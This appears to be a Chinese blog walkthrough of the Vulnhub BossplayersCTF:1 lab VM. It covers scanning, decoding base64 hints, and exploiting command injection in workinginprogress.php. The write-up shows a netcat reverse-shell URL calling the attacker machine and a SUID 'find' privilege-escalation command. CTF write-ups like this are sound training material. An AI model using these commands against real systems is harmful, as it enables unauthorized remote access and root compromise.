Vulnhub -> BossplayersCTF:1

一、测试环境

BossplayersCTF靶机、Mac攻击机、kali2020辅助攻击机

VM名称:BossplayersCTF:1
下载(镜像):https://www.vulnhub.com/entry/bossplayersctf-1,375
目标:获得root.txt并获得root权限
运行:VirtualBox
描述:Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF's. It should take around 30 minutes to root.

靶机BossplayersCTF

image-20210305203819492

二、信息收集

1.nmap扫描ip地址

172.20.10.6
image-20210305204421203

我们访问ip地址看看~

image-20210305204542521

2.扫描详细信息~

8505F88447E4F208478C3FBA0657FA4C

3.扫描网站目录,看看有啥发现

dirsearch -u http://172.20.10.6 -e *
image-20210305205320691

发现了robots.txt~查看一番

4.查看robots.txt

image-20210305205406695

嗯。base64加密,解密去~

image-20210305205452916
lol try harder bro

5.没啥发现。F12看一看吧~

image-20210305205600391

找到了一串密文~貌似base64加密~

三次base64解密得到结果~

workinginprogress.php

三、渗透测试

1.我们访问该页面-发现命令执行漏洞

image-20210305221019903
下面这个代码可能存在命令执行漏洞
Test ping command - [ ]

经测试,确实存在命令注入漏洞

image-20210305221610418

2.反弹shell

访问下面这个链接

http://172.20.10.6/workinginprogress.php?cmd=nc -e /bin/bash 172.20.10.7 1234

得到反弹shell

image-20210305224324564
使用python命令获得shell
python -c 'import pty;pty.spawn("/bin/bash")'
image-20210305224615424

四、提权

查找居于SUID权限可执行文件,发现/usr/bin/find

find / -perm -u=s -type f 2>/dev/null
image-20210305224837522

find命令提权

find . -exec /bin/sh -p \; -quit
image-20210305224934822

五、寻找flag

image-20210305225314319
congratulations

Done!

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇